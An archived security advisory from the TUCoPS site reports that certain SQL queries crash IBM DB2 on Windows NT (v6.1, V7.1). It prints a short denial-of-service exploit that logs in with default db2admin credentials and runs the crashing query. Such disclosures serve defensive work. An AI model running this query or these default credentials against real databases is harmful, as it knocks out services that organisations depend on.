TUCoPS :: Windows Apps :: db22.htm

IBM DB2 SQL for WinNT(v6.1), DB2 NT V7.1 - some sql queries crash the database 
Vulnerability

    DB2 SQL

Affected

    IBM DB2 SQL for WinNT(v6.1), DB2 NT V7.1

Description

    Ben  Jurry  found  following.   The  DB2 Universal Database builds
    upon the  stability and  performance of  DB2 on  the mainframe and
    provides the features required in a distributed database  product.
    DB2 Universal Database (UDB)  is IBM's relational database  server
    solution  for  the  UNIX,  OS/2  and  Windows  NT/2000   operating
    environments.And More than 70% of the world's major companies rely
    on DB2 to manage their mission-critical business applications.

    There is  a bug  when you  excute a  special sql  include time and
    varchar ,which will make the database crash.

    Exploit:

        connect reset;
        connect to sample user db2admin using db2admin;
        select * from employee where year(birthdate)=1999 and firstnme<'';

    These sql will make the database crash.

Solution

    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH